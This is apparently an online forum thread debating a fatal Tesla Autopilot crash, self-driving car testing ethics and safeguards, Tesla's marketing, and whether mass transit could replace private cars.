For whatever reason it kind of reminds me of criminal vs. civil court cases. In a criminal case it's on the prosecution to prove guilt beyond a reasonable doubt; in a civil case the standard is only a preponderance of the evidence. For some reason I feel like Tesla is in a criminal case but having to act like it's a civil one, where if they don't prove themselves they will lose out big.
To me it feels like the proof is there. The data is there. The facts are known. The fact that every other Tesla driver using Autopilot in that precise location doesn't suffer the same fate points toward something else going on, but the driver's actions also don't seem to match up with what is known about him and the story being presented on the other side. It's really a hairy situation, and I feel like it warrants all sorts of tiptoeing around, but I also have the feeling that allowing that "feeling" aspect to dictate the arguments for either side of this case is just working backwards.
And for what it's worth I don't own a Tesla, I've never thought about purchasing one. I like the idea, my brother's friend has one and it's neat to zoom around in but I'm just trying to look at this objectively from all sides without pissing too many people off. Sorry if I did that to you, it wasn't my intent.
No one wins when someone dies... I'm sure you're right that Tesla employees are torn up.
My concern is that Tesla looks like it's 90% of the way to full autonomy, and the way the feature is marketed will lull even engineers who know how these systems work into a false sense of security, and they'll end up dying as a result -- they'll trust a system that shouldn't be trusted. There isn't a good way to detect a lack of focus, especially when it takes only a few milliseconds to go from fine to tragic.
I have to preface my post to say that I think developing self-driving automobiles is so important that it's worth the implied cost of potentially tens of thousands of lives in order to perfect the technology, because that's what people do; make sacrifices to improve the world we live in so that future generations don't have to know the same problem. But I think you're right. I think the "best" way to move forward until we have perfected the technology is not something that drives for you, but something that will completely take over the millisecond the car detects that something terrible is about to happen. People will be engaged because they have to be engaged, to drive the car. The machine can still gather all the data and ship it off to HQ to improve itself (and compare its own decisions to those of the human driver, which IMO is infinitely more valuable). But if there's one thing the average person is terrible at, it's reacting quickly to terrible situations. You're absolutely right that people can't be trusted to remain actively engaged when something else is doing the driving. Great example with the cruise control, too.
No one dies so that someone 10 years from now can watch a full episode of Family Guy unimpeded for the duration of their commute.
The human toll is irrelevant to the conversation; what's relevant is whether the risks taken are being taken knowingly. You cannot market a self-driving vehicle whose functionality "is 2x better than any human being" while simultaneously stating, in the legal language that protects you, don't take your hands off the wheel. That's bs.
Plenty of people die right now because they just got a text or they had no other way home from the bar, etc.
The human toll is absolutely relevant to the conversation: this is about people dying now and in the future. It seems cruel to discuss it in an "I'll sacrifice X to save Y" manner, but it can reasonably be reduced to that.
I think it's safe to assume that this will drastically reduce driving related injuries and deaths.
It's deceptive to assume Autopilot saves lives when it too has taken them. The number of people with access to Autopilot is far too small to statistically determine how many more center-divider deaths we might have if everyone were its passenger.
Is the life taken by auto pilot worth less than the life taken by the aggressive driver who takes out an innocent driver? No.
I hope we eventually save lives, as in a net improvement on current death totals, by using these technologies. But the risks are not well communicated, the marketing is entirely out of sync with the risks, and thus the "martyrs" we create look to me like victims.
> Is the life taken by auto pilot worth less than the life taken by the aggressive driver who takes out an innocent driver? No.
I think beliefs such as these are fueled by the extremely naive implication that each death will cause the learning algorithm to "improve itself", so every self-driving thing out there is safer owing to that death.
That's not the thrust of my point... Talking about how many people have to die to perfect autonomous vehicles is pointless; some people are willing to jump out of airplanes, and they fully understand the risks.
Some number of people, N, are willing to risk their lives to use autonomous vehicles, and they'll die as a result. The risks involved should be just as clear to the person using Autopilot, not obscured by marketing fluff that doesn't come close to reality. Martyrs, not victims.
>I think it's safe to assume that this will drastically reduce driving related injuries and deaths.
This assumes that self-driving tech will continue to increase in competence and will at some point surpass humans. I find that extremely optimistic, bordering on naive.
Consider something like OCR or object recognition alone, where similar tech is applied. Even with decades of research behind it, it cannot come anywhere close to a human in terms of reliability. And I am talking about stuff that can be trained endlessly without any sort of risk. Still it does not show an ever-increasing capability.
Now, machine learning and AI is only part of the picture. The other part is the sensors. This again is not anywhere near the sensors a human is equipped with.
What we have seen in the tech industry in recent years is that trust in a technology, even among intelligent people such as those investing in it, is not based on logic (Theranos, uBeam etc). I think such a climate is exactly what is enabling tests like these. But unlike the others, these tests are putting unsuspecting lives on the line. And that should not be allowed.
It is optimistic. Is it naive? Only in the sense that I don't do development in that realm and I can only base my assessment on what's publicly discussed.
Please note that I artfully omitted a due date on my assumption. There's so much money involved here and so much initial traction that it is indeed reasonable to think that tech can surpass a "normal" driver.
I'm also biased against human drivers, plenty of whom should not be behind the wheel.
>There's so much money involved here and so much initial traction that it is indeed reasonable to think that tech can surpass a "normal" driver.
I don't think it is reasonable at all to reach that conclusion based on the money involved... You just can't force progress or breakthroughs by throwing money at a problem.
>I'm also biased against human drivers, plenty of whom should not be behind the wheel.
So I think it would be quite trivial to drastically increase the punishment of dangerous practices if caught. I mean, suspend license or ban for life if you are caught texting while driving or drunk driving.
Money absolutely matters. If there's no money, there's no development. And vice versa. That funded development isn't a guarantee of success, but it raises the odds to be non-zero.
You're also ignoring a key point: we have "self-driving" cars right now, but they're not good enough yet. Computer hardware is getting cheaper day by day, and right now the limiting factor appears to be the cost of sensors.
>Money absolutely matters. If there's no money, there's no development. And vice versa.
Both are not true. It does not take money for someone to have a great breakthrough idea. It is also not possible to guarantee generating a great idea by just throwing more and more money at researchers...
Here is the messy situation: maybe this system is better at avoiding accidents than 40% of the people 99.999% of the time.
The best thing is to build a system to analyze your driving and figure out if you are in that 40% of people and then let it drive for you. Maybe drunk drivers, for example. It can do this per ride: “oh you’re driving recklessly, do you want me to take over?”
EVERYTHING ELSE SHOULD BE A STRICT IMPROVEMENT. Taking over driving and letting people stop paying attention is not a strict improvement.
The argument should NOT be about playing with people's lives now so that in the future some people can have a better system. That's a ridiculous argument. Instead, WHY DON'T THE COMPANIES COLLABORATE ON OPEN SOURCE SOFTWARE AND RESEARCH TO ALL BUILD ON EACH OTHER'S WORK? Capitalism and "intellectual property", that's why. In this case, a gift economy like SCIENCE or OPEN SOURCE is far, far superior at saving lives. But we are so used to profit-driven businesses that it's not likely they will take such an approach.
What we have instead is companies like Waymo suing Uber and Uber having deadly accidents.
And what we SHOULD have is if an incremental improvement makes things safer, every car maker should be able to adopt it. There should be open source shops for this stuff like Linux that enjoy huge defensive patent portfolios.
Pioneers are usually people well aware that what they're doing is risky. I doubt that the victims of the recent Tesla crashes and of the latest Uber crash regarded themselves as pioneers. They probably just wanted to arrive safely at their destination and relied on a feature marketed as capable of bringing them there.
The pioneers in this case are putting other people’s life at risk.
Waymo seems to demonstrate that improving self-driving cars without leaving a trail of bodies behind is in the realm of possibility, so let's measure Tesla against that standard.
The cars can improve by being pieces of soft foam emulating the aerodynamics of a car while atop a metal base with wheels and an engine inside the foam. They would be fully autonomous with no human driver, avoid collisions as much as possible and yet fluffy enough to not hurt anyone even at high speeds.
I disagree with your initial sentiment. In my opinion, we can have self driving cars without a large human toll. I just think we need to stop trying to merge self driving cars into a road system designed for human operators. Moreover, we should not be "beta testing" our self driving cars on roads with human operators. Accidents will happen, as ML models can and do go unstable from time to time. Instead, we should look to update our roads and infrastructure to be better suited to automated cars. Till then, I hope those martyred in the name of self driving technology are not near and dear to you (even if you'd feel it's worth it).
To me, beta testing should be a long period of time where the computer runs while humans drive, with deviations between what the computer would do if it had control and what the human actually does being recorded for future training. The value-add is that the computer can still be used to alert the driver to dangerous conditions, or potentially even override in certain circumstances (applying the brake when lidar sees an obstacle at night that the human driver didn't see). A sketch of the idea follows below.
The problem is that Uber needs self driving cars in order to make money, and Tesla firmly believes that their system is safer than human drivers by themselves (even if a few people who wouldn't have otherwise died do, others who might have died won't and they believe those numbers make it worth it).
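A hedged sketch of that shadow-mode loop (every name below is hypothetical; no manufacturer's actual API is being described):

    def shadow_step(model, sensor_frame, human_controls, log, threshold=0.2):
        predicted = model.plan(sensor_frame)  # what the computer would have done
        disagreement = abs(predicted.steering - human_controls.steering)
        if disagreement > threshold:
            # Disagreements are the interesting frames: either the model is
            # wrong (future training data) or the human is (a candidate for
            # an alert, or a defensive override like emergency braking).
            log.append((sensor_frame, human_controls, predicted))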
It's surprising that this isn't the standard right now. I'm certain the people at Tesla/Uber/Waymo have considered this - I'm curious why this approach isn't more common.
How about all those martyred by prolonging our current manual driving system for the years and decades it will take to roll out separate infrastructure for vehicles no one owns, because they can't drive them anywhere?
I think we need to keep the human driver in control, but have the computers learning through that constant, immediate feedback.
And get rid of misleading marketing and fatal user experience design errors.
>but have the computers learning through that constant, immediate feedback.
I don't know what is stopping them from simulating everything inside a computer.
Record the input from all the sensors while a sensor-equipped car is driven through real roads by a human driver.
Replay the sensor input, with enough random variations, and let the algorithms train on it.
Continue adding to the library of sensor data by driving the sensor car through more and more real-life roads and situations. Keep feeding the ever-increasing library of sensor data to the algorithm, safely inside a computer. (A sketch of this loop is below.)
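As a sketch of that replay pipeline (all names hypothetical; this is the shape of the idea, not anyone's actual stack):

    def train_on_replays(model, recorded_drives, perturb, epochs=10):
        # Each recorded drive is a sequence of (sensor_frame, human_action)
        # pairs captured while a human drove the instrumented car.
        for _ in range(epochs):
            for drive in recorded_drives:
                for sensor_frame, human_action in drive:
                    noisy = perturb(sensor_frame)      # the "random variations"
                    model.update(noisy, human_action)  # supervised imitation step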
Not following you here. What do you mean by "The map is not the territory"?
What I mean is this: do not "teach" the thing in real time. Instead, collect the sensor data from cars a human is driving (and collect the human input as well), and train the thing on it, safely inside the lab.
You say they have done this already. But I am asking if they have done it enough. And if so, how come accidents such as these are possible, when the situation is straight out of a basic driving textbook?
I don't think it'll take years to update our infrastructure. For example, we could embed beacons into catseyes to make it easier to know where the road boundaries are etc. Also, we could make sections of the highway available with the new infrastructure piece by piece. It is just as progressive as your suggestion, but the problem becomes a whole lot easier to solve when you target change towards infrastructure as well as the car itself.
"I just think we need to stop trying to merge self driving cars into a road system designed for human operators. Moreover, we should not be "beta testing" our self driving cars on roads with human operators."
Sounds like requiring exclusive access - I apologize if that was a misinterpretation.
If you have human and automated drivers in the same roads, the computers have to be able to cope with the vagaries of human drivers.
How can you then get away from '"beta testing" our self driving cars on roads with human operators' if that is their deployment environment?
> I have to preface my post to say that I think developing self-driving automobiles is so important that it's worth the implied cost of potentially tens of thousands of lives in order to perfect the technology, because that's what people do; make sacrifices to improve the world we live in so that future generations don't have to know the same problem.
This is the definition of a false dichotomy and it implicitly puts the onus on early adopters to risk their lives (!) in order to achieve full autonomy. Why not put the onus on the car manufacturer to invest sufficient capital to make their cars safe!? To rephrase what you said with this perspective:
> ...developing self-driving automobiles is so important that it's worth the implied cost of potentially tens of billions of investor dollars in order to perfect the technology, because that's what people do; make sacrifices to improve the world we live in so that future generations don't have to know the same problem.
This seems strictly better than the formulation you provided. How nuts is it that the assumption here is that people will have to die for this technology to be perfected. Why not pour 10x or 100x the current level of investment and build entire mock towns to test these cars in - with trained drivers emulating traffic scenarios? Why put profits ahead of people?
This reply is a classic straw man (and one of the main reasons I left Facebook behind). You are making an assumption here that's wrong and I hate that I have to speak to what you've said here because you are reading words that I didn't type. I personally would not choose to put profits ahead of people. But I didn't say anything about profit. I deliberately left profit and money completely out of my post for a reason. You also seem to be suggesting that throwing money at the problem is going to magically make it perfectly safe. You are looking for guarantees and I'm sorry to break it to you, but there are no guarantees in life. "Screws fall out all the time". People are going to die in the process of developing self-driving automobile technology. People are going to die in situations that have nothing to do with self-driving automobile technology. Deaths are inevitable and I am saying that it is worth a perceived significant loss of human life to close the gap using technology so that the number of people dying on the roads every year approaches zero.
> I have to preface my post to say that I think developing self-driving automobiles is so important that it's worth the implied cost of potentially tens of thousands of lives in order to perfect the technology, because that's what people do; make sacrifices to improve the world we live in so that future generations don't have to know the same problem.
I generally agree with this philosophy but this is very optimistic, at least in the United States. This is a country where we can't even ban assault rifles let alone people from driving their own vehicles. You're going to see people drive their own vehicles for a very long time even if self driving technology is perfected.
I think there is a key point that will result in the freedom to drive being stripped long before assault rifles. Imagine if I create a private road from SF to LA and say that only self-driving cars can drive on it. The vehicles on this road are all interconnected, allowing them to travel at speeds in excess of 150 MPH, and since the road I've created is completely flat, the ride is still smooth. But if I allow cars whose actions can't be predicted (cars driven by humans), it becomes impossible to drive safely at these speeds. So I, as the road owner, ban human-driven cars from my private toll road. As this becomes more prevalent, I will no longer have the want or need to drive my own car, because then it takes me 6 hours to get to LA instead of 2. All the while, there's no reason for me to get rid of my assault rifle, because I really enjoy firing it out the window of my self-driving car at 150 MPH on the way to LA.
With a train, I have to physically go to the train station, park my car, walk and find which train/subway to hop on, sit next to other people in a crowded, confined space, possibly get off and onto another train going to a different destination, then get off the train and walk / get a rental car to where I actually want to go.
Compare the above to: hop in my car, drive to the freeway, turn on self-driving, turn off self-driving once I exit the freeway, find parking near where I'm going, and walk in.
As a society, we've done a lot more in the name of convenience.
> Are you going to having a train running every few minutes to really make the delays comparable?
Commuter rail systems run at 2 minute headways or less. Long-distance trains mostly don't but that's largely due to excessive safety standards - for some reason we regulate trains to a much higher safety standard than cars. Even then, the higher top speeds of trains can make up for a certain amount of waiting and indirect routing. (Where I live, in London, trains are already faster than cars in the rush hour).
> What's the relative cost of all that vs. pavement?
When you include the land use and pollution? Cars can be cheaper for intercity distances when there's a lot of similarly-sized settlements, but within a city they waste too much space. And once you build cities for people rather than cars, cars lose a lot of their attraction for city-to-city travel as well, since you're in the same situation of having to change modes to get to your final destination.
> for some reason we regulate trains to a much higher safety standard than cars
That "some reason" is physics. According to a quick Google search, an average race car needs 400m of track length from 300 km/h to 0 km/h. A train will require something around 2500m, over 5x the distance, to brake from the same speed. Trains top out at -1.1m/s² deceleration, an ordinary car can get -10m/s² deceleration.
Part of the reason is also that in a car, people are generally wearing their seatbelts, which means you can safely hit the brakes at full power. In a train, however, people will be walking around, standing, taking a dump on the loo - and no one will be wearing a belt. Unless you want to send people literally flying through the carriages, you can't go very much over that 1.1 m/s² barrier.
Because of this, you have the requirement that signalling blocks be spaced so that a train at full speed can still come to a full stop before the next block signal. Also: a train can carry thousands of people. Have one train derail and crash into, e.g., a bridge, or crash into another train, and you're looking at way, way more injuries and deaths than even a megacity could cope with, much less a rural area.
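For reference, those distances follow from the constant-deceleration formula (idealized: no reaction time, no signalling margin; note the idealized train figure actually comes out longer than the quoted 2,500 m):

    d = \frac{v^2}{2a}, \qquad v = 300\ \text{km/h} \approx 83\ \text{m/s}

    d_{\text{car}} \approx \frac{83^2}{2 \cdot 10} \approx 345\ \text{m}, \qquad
    d_{\text{train}} \approx \frac{83^2}{2 \cdot 1.1} \approx 3100\ \text{m}

At a given speed, braking distance scales inversely with achievable deceleration, which is why signalling blocks, not driver reaction, set the safety envelope for rail.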
My point is that the overall safety standard is wildly disproportionate even so. The rate of deaths/passenger/mile that we accept as completely normal for cars would be regarded as disastrous for a train system.
I mean, if there’s the demand, sure. Lots of commuter trains run at that sort of rate.
Though your train of cars would likely have such low passenger density that a series of buses would be just as good. Special lanes just for buses are already a thing.
So you exit the self driving private road to enter a public road where there are still local residents who insist on driving their own vehicle. Some of these residents have never been to location X and have no interest in it. They care about their neighborhood and getting around however they want.
The point is driving is a freedom and getting rid of it in this country will be hard. I'd imagine self driving vehicles having more prevalence in China where the government can control what destinations you have access to and monitor your trips.
You'll see municipalities and then states banning cars, starting with soft, incentive-based approaches, then harder approaches once enough people switch over.
Many states (red) won't ban them for a very long time.
The impact on the freedom to travel will have to be secured and decentralized, without any government kill switches.
> You'll see municipalities and then states banning cars
Which states? Maybe a few in New England, but I don't see that happening anywhere else. Counties perhaps, but there are rural areas pretty much everywhere, and people are going to want the freedom to drive their own vehicle.
Economic incentives and competition will eventually cause it to happen regardless of sentiment. First, insurance rates for manually driven cars will shoot through the roof as less risky drivers moving to self-driving cars decimate that risk pool (as if gun owners were required to carry insurance for misuse). Second, cities that go self-driving-only will have a huge advantage in infrastructure utilization and costs, as roads are used more efficiently (with smoother traffic) and parking lots/garages become a thing of the past. Residents will push for it if it means not being stuck in traffic anymore. Or worse, people and companies will relocate to cities with exclusive self-driving car policies, creating a huge penalty for cities that don't or can't do that.
In comparison, the economic impact/benefit of banning assault rifles is negligible (and definitely not transformative) even if I personally think it is the morally right thing to do. (Maybe we can make the case later if school security and active shooter drills become prohibitively expensive and/or annoying)
> Or worse, people and companies will relocate to cities with exclusive self driving car policies
So people will relocate to avoid traffic? Why doesn't this happen today? Suppose San Francisco decided to not enforce self driving laws to protect small businesses and preserve community infrastructure and culture. Now suppose Phoenix (only picked because they've been progressive with self driving technology) does enforce self driving laws, would you expect a mass exodus from San Francisco to Phoenix?
Additionally, it isn't really SF vs. Phoenix. Think global competition: if developing mega-cities in Asia adopt this before American cities do, they will be able to catch up with, and very likely exceed, their American counterparts economically in a short period of time.
> First, insurance rates for manually driven cars will shoot through the roof as less risky drivers moving to self driving cars decimate that risk pool (like if gun owners were required insurance for misuse).
Why would the less-risky drivers move to self-driving cars first? Wouldn't some of the higher-risk demographics (e.g. the elderly) make the move first since they have more incentive to do so?
> Second, cities that go to self driving only will have a huge advantage in infrastructure utilization and costs as roads are used more efficiently (with smoother traffic) and parking lots/garages become a thing of the past. Residents will just push for it if it means not being stuck in traffic anymore.
I think self-driving cars will be really cool and reduce traffic accidents once they're perfected, but a lot of these assumptions don't make sense. Unless a critical mass switches to car-sharing, autonomous cars and no parking will make rush hour worse because now each car will make the round trip to work twice a day instead of just once. Also, what happens to the real-estate where the parking lots are now? The financially sound thing to do will probably be converting these lots to more offices/condos/malls. So urban density will increase - increasing traffic.
Even if autonomous cars radically improve traffic flow, I suspect we'll just get induced demand [1]. More people will take cars instead of public transit and urban density will increase until traffic sucks again.
> Wouldn't some of the higher-risk demographics (e.g. the elderly)
Elderly aren't usually considered higher risk. The young kids are, enthusiasts are, people who drive red sports cars are.
> Unless a critical mass switches to car-sharing, autonomous cars and no parking will make rush hour worse because now each car will make the round trip to work twice a day instead of just once.
Autonomous cars should be mostly fleet vehicles (otherwise you have to park it at home).
Isn't that just like in most of the major world cities where taxis are the norm rather than the exception? It isn't weird for a taxi in Beijing to make 5-6 morning commute rounds. But even then, there are a lot of reverse commutes to consider.
> The financially sound thing to do will probably be converting these lots to more offices/condos/malls.
While density can increase, convenient affordable personal transportation also allows the opposite to occur. Parks, nice places, and niche destinations, are also possible.
Think of it this way, once traffic is mitigated, urban planning can apply more balance to eliminate uneven reverse commute problems. There will still be an incentive to not move, but movement in itself wouldn't be that expensive (only 40 kuai to get to work in Beijing ~15km, I'm sure given the negligible labor costs, autonomous cars can manage that in the states).
We are asking that self driving cars be ALLOWED if the user chooses, even IF the safety is in doubt. This is because of just how extremely important this issue is.
While I agree with your conclusion, the opening line strikes me as silly. Why is it "so important" to have self-driving cars? These cars that can't detect stationary objects directly in front of them are nowhere close to the self-driving pipe dream that's been around for a century. Maybe by 2118 we'll be making more progress.
Also, people are terrible at detecting objects directly in front of them, and just like computers, the human brain can be cheated, overloaded, inept, or inexperienced, leading to an accident.
Now we have cars with lane assist, smart braking, and autopilot features, and that's only in the past 5-10 years.
Of all the places where technology can save lives, it's definitely in vehicles/transportation.
> Also, people are terrible at detecting objects directly in front of them, and just like computers, the human brain can be cheated, overloaded, inept, or inexperienced, leading to an accident.
How many optical illusions do you usually see on the road while driving that can result in an accident?
I am not even talking about the "people are terrible at detecting objects directly in front of them" part.
I mean, how can you be a human being and say this? If we were "terrible at detecting objects directly in front of us", we would have been predated out of existence a long time ago.
Dips aren't quite an optical illusion; nor are blind spots, or obscured vehicles (behind the frame of the car or behind another vehicle), but those are all quite common and are similar to illusions (you see imperfectly).
Sometimes you'll see multiple white lines, or lanes that appear to veer off due to dirt on the road. A bit of litter looks like a person; a kid looks like they might run out.
A lot of times I find I'm searching for something and can't see it but it was in my visual field. I think this worsens with age.
They're similar in the sense that you don't see what you need to see; in the limited locus of "ability to safely control a vehicle" I consider them similar.
An optical illusion is not similar to being unable to see an object behind an opaque object. And when you say "the brain can be cheated", that means an optical illusion.
That is the only thing I was responding to at the start of this discussion. Essentially the person was saying the human brain can be cheated just like a computer.
I am saying: No. Not just like a computer. Human brains do not get cheated as easily as computers. Claiming that is outrageous and shows you have no idea what you are talking about...
We're not talking about complicated scenarios with multiple moving actors. Tesla's autopilot cannot even do something as basic as detect stationary obstacles that are directly in front of the car. It will crash into barriers even if the highway is completely devoid of other cars.
You may consider humans bad drivers, but Tesla's Autopilot is even worse than that:
I'm talking about the pitfalls of human perception, and the low-hanging fruit of ways that self-driving systems can potentially outperform humans.
I'm not claiming Tesla's system is currently better than a human, just that there is plenty of potential for a machine to outperform humans perceptually. As it is, Tesla's system isn't exactly the gold standard.
I am not really sure if the development of SDVs is really that important, but even if it were, your proposal would only be acceptable if it were you and Mr. Musk racing your Teslas on Tesla's private proving grounds. Somewhere in the Kalahari desert seems like an acceptable location. The moment the people "making a sacrifice" are unsuspecting customers, and eventually innocent bystanders, you are veering very much into Dr. Mengele's territory.
Actually, one thing that I was curious about regarding this incident: they say that authorities had to wait for a team of Tesla's engineers to show up to clean up the burning mess of batteries. Luckily for everyone else trying to get somewhere on 101 that day, Tesla's HQ isn't too far away. What if the next time one drives into a barrier, it happens in the middle of Wyoming? Will the road stay closed until Tesla's engineers can hitch a ride on one of Musk's Falcons?
So we should kill even more people, who never signed up to be guinea pigs, so that maybe there will be a self-driving car at some point? Which most of those dying in these crashes will not be able to afford anytime soon anyway...
That's assuming that the replacement actually is safer, which in the case of Autopilot is not the case now, and not necessarily the case ever. There is a reason Waymo isn't unleashing their stuff onto an unsuspecting public.
> "I am not really sure if development of SDVs is really that important"
For the 1.3 million people killed and the 20-50 million injured EVERY YEAR, and their loved ones, yeah, it's really that important.
Is it ready today? No. We're in pretty violent agreement on that.
Will we get there? I don't see much reason to doubt that we will, eventually. It may require significant infrastructure changes.
It's pretty clear Waymo/Uber are pushing the envelope too hard, without adequate safeguards, but "only be acceptable if it were you and Mr. Musk...on Tesla's private proving grounds" is probably not pushing the envelope enough.
Even Waymo is "unleashing their stuff onto unsuspecting public" by driving them on public roads - lots of innocent bystanders potentially at risk there.
Both Waymo and even Uber do not pretend that their systems are ready for public use, and at least allegedly have people who are paid to take over (granted, in Uber's case it's done as shadily as everything else Uber does). Tesla sells their half-baked stuff to everyone, with marketing that strongly implies they could do self-driving now, if only not for those pesky validations and regulations. I think there's quite a bit of a difference.
A lot of deaths and injuries on the road happen in countries with bad infrastructure and a rather cavalier attitude to the rules of the road. Fixing those could save more people sooner than SDVs that they won't be able to afford any time soon. Not to mention that an SDV designed in the first world (well, the Bay Area's roads are closer to third world, but still...) isn't going to work too well when everyone around drives like a maniac on a dirt road.
Not to say that SDVs wouldn't be neat, when they actually work, but this is a very SV approach: throwing technology at the problem to create an overpriced solution to problems that could be solved much more cheaply, but in a boring way that doesn't involve AI, ML, NN, and whatever other fashionable abbreviations.
IIRC, it was also Volvo who a few years back said that they would gladly take on any liability issues for their self-driving cars. Only to backtrack on that a short while later after having learned what liability laws in the U.S. actually look like, saying that they wouldn't take on such liability until the laws are changed to be more in their favor. So there's that ...
> because that's what people do; make sacrifices to improve the world we live in so that future generations don't have to know the same problem.
Whose lives are we sacrificing? In the case of the Uber crash in Tempe and this Tesla crash in California, the people who died did not volunteer to risk their lives to advance research in autonomous vehicles.
I highly respect individuals who choose to risk their lives to better the world or make progress, like doctors fighting disease in Africa and astronauts going to space, but at the same time, I think this must always be a choice. Otherwise we could justify forcing prisoners to try new drugs as the first stage of clinical trials. Or worse things. Which is why there is extensive vetting before approval for clinical trials is given.
I do think that, once the safety of autonomous vehicles has been proven on a number of testbeds, but before they are ready for deployment, it is justifiable to drive them on public roads. Maybe without safety drivers. But until then, careful consideration should be given to their testing.
Uber should not have been able to run autonomous vehicles with safety drivers where the safety driver could be allowed to look away from the road for several seconds while the car was moving at >30mph. The car should automatically shut off if it is not clear whether the safety driver is paying attention. And there should be legislation that bans any company that fails to implement basic safeguards like this from testing again for at least a decade, with severe fines. Probably speeds should also be limited to ~30mph for the first few years of testing while the technology is still so immature, as it is today.
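For what it's worth, the safeguard I'm describing is simple to express. A minimal sketch in Python, where the 2-second gaze timeout and the "disengage" behavior are my own illustrative assumptions, not any vendor's actual system:

    import time

    GAZE_TIMEOUT_S = 2.0   # assumed: max time the safety driver may look away

    class AttentionWatchdog:
        """Flag a disengage if the safety driver stops watching the road."""

        def __init__(self):
            self.last_eyes_on_road = time.monotonic()

        def report_gaze(self, eyes_on_road: bool) -> None:
            # Would be called by a driver-facing camera pipeline each frame.
            if eyes_on_road:
                self.last_eyes_on_road = time.monotonic()

        def check(self) -> str:
            looked_away_for = time.monotonic() - self.last_eyes_on_road
            if looked_away_for > GAZE_TIMEOUT_S:
                # A real system would execute a minimal-risk maneuver
                # (slow down, pull over), not cut power mid-traffic.
                return "disengage"
            return "ok"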
Similarly, Tesla should not be allowed to deploy their Autopilot software to consumers before they conduct studies to show that it is reasonably safe. Repeated accidents have shown that Level 1 and Level 2 autonomous vehicles, where the car drives autonomously but the driver must be ready to intervene, are a failed model unless the car actively monitors that the driver is paying attention.
Overall, I think justifying the current state of things by saying that people must be sacrificed for this technology to work is ridiculous. Basic safeguards are not being used, and if we require them, maybe autonomous vehicles will take a few years longer to reach deployment, but thousands of lives lost could become tens.
Edit: I read in another comment that the Tesla car at least "alarms at you when you take your hands off the wheel". In that case I think what Tesla is doing is much more reasonable. (Not Uber, though.) Although I still feel like it is going to be hard to react to dangerous situations when the system operates correctly almost all the time (even if you are paying attention and have your hands on the wheel). But I'm not sure what the correct policy should be here, because I don't fully understand why people use this in the first place (since it sounds like Autopilot doesn't save you any work).
In that case Tesla's Autopilot is a red herring. It's not a fully autonomous system. If you're willing to sacrifice human lives, then please sacrifice them on systems that actually have a chance of working. Tesla's Autopilot isn't one of them; it's most likely never going to reduce the fatality rate below that of a sober human, because it's just a simple lane-keeping and cruise-control assistant.
Cars should just be phased out in favor of mass transit everywhere.
Yes, you can live without the convenience of your car. No really, you can.
Now think about how you would enable that to happen. What local politicians are you willing to write to, or support, in order to enable a better mass transit option for you? And how would you enable more people to support those local politicians that make that decision?
This is the correct solution, since the AI solution of self-driving cars isn't going to happen. Their fatality rates are going to remain high.
> Yes, you can live without the convenience of your car. No really, you can.
Maybe, but unless you can change the laws of nature, you can't build a mass transit system that can serve everyone full-time with reasonable efficiency and cost-effectiveness, and that's just meeting the minimum requirement of getting from A to B, without getting into all the other downsides of public vs. private transportation in terms of health, privacy, security, etc.
There's no need to make anything up. Mass transit systems are relatively efficient if and only if they are used on routes popular enough to replace enough private vehicles to offset their greater size and operating costs (both physical and financial). That usually means big cities, or major routes in smaller cities at busier times.
Achieving 24/7 mass transit, available with reasonable frequency for journeys over both short and long distances, would certainly require everyone to live in big cities with very high population densities. Here in the UK, we only have a handful of cities with populations of over one million today. That is the sort of scale you're talking about for that sort of transportation system to be at all viable, although an order of magnitude larger would be more practical. All of those cities have long histories and relatively inefficient layouts, which would make it quite difficult to scale them up dramatically without causing other fundamental problems with infrastructure and logistics.
So, in order to solve the problem of providing viable mass transit for everyone to replace their personal vehicles, you would first need to build, starting from scratch or at least from much smaller urban areas, perhaps 20-30 new big cities to house a few tens of millions of people.
You would then need all of those people to move to those new cities. You'd be destroying all of their former communities in the process, of course, and for about 10,000,000 of them, they'd be giving up their entire rural way of life. Also, since no-one could live in rural areas any more, your farming had better be 100% automated, along with any other infrastructure or emergency facilities you need to support your mass transit away from the big cities.
The UK is currently in the middle of a housing crisis, with an acute lack of supply caused by decades of under-investment and failure to build anywhere close to enough new homes. Today, we're lucky if we build 200,000 per year, while the typical demand is for at least 300,000, which means the problem is getting worse every year. The difference between home-owners and those who are renting or otherwise living in supported accommodation is one of the defining inequalities of our generation, with all the tensions and social problems that follow.
But sure, we could get everyone off private transportation and onto mass transit. All we'd have to do is uproot about 3/4 of our population, destroy their communities and in many cases their whole way of life, build new houses at least an order of magnitude faster than we have managed for the last several decades, achieve total automation in our out-of-city farming and other infrastructure, replace infrastructure for an entire nation that has been centuries in development... and then build all these wonderful new mass transit systems, which would still almost inevitably be worse than private transportation in several fundamental ways.
Why so big, though? I lived in a town of 25,000 people in Sweden and did not need a car more than a few weekends per year. There were five bus lines for local transport, and long-distance buses and trains ran with quite high frequency.
And that's not taking into account the fact that a bicycle is a very viable way to get around in cities of fewer than 200,000 inhabitants.
I have actually never owned a car; I just rent one once in a while to go somewhere regular transport doesn't get me. I have lived in Sweden, France, and Spain, in 10 cities from 25,000 to 12 million inhabitants. Never felt restricted. I actually feel much more restricted when I drive, because I have to worry about parking, which is horrible in both Paris and Stockholm. Many people I know, even in rural Sweden or France, don't own a car because it is just super costly and the benefit is not worth it. It's very much a generational thing though, because my friends are mostly around 26-32, whereas nearly everyone I know over 35 owns a car, even if they don't actually have that much money and sometimes complain about it.
You've almost answered your own question, I think. Providing mass transit on popular routes at peak times is relatively easy. It's more difficult when you need to get someone from A to B that is 100 miles away, and then back again the same day. It's more difficult when you are getting someone from A to B at the start of the evening, but their shift finishes at 4am and then they need to get home again.
To provide a viable transport network, operating full-time with competitive journey times, without making a prohibitive financial loss or being environmentally unfriendly, you need a critical mass of people using each service you run. That generally means you need a high enough population density over a large enough urban area that almost all routes become "main routes" and almost all times become "busy times".
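A rough sketch of that arithmetic (every figure below is invented for illustration): running a fixed-frequency service costs roughly the same whether or not anyone rides, so cost per passenger explodes off-peak.

    # Invented figures: cost per passenger of a fixed-frequency bus route.
    COST_PER_BUS_HOUR = 120.0    # driver + fuel + maintenance (assumed)
    BUSES_PER_HOUR = 4           # a "reasonable frequency" service (assumed)

    hourly_cost = COST_PER_BUS_HOUR * BUSES_PER_HOUR

    for riders_per_hour in (400, 40, 4):   # busy route, quiet route, 3am route
        cost_each = hourly_cost / riders_per_hour
        print(f"{riders_per_hour:>3} riders/h -> ${cost_each:7.2f} per passenger")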
You're right. But you're going to have to change the whole of society to achieve that end: from the law, through planning and building, through entertainment, shopping and all, to farming... the whole caboodle.
I lived car-free in a small industrial UK city; we couldn't manage that with kids (too expensive, for one).
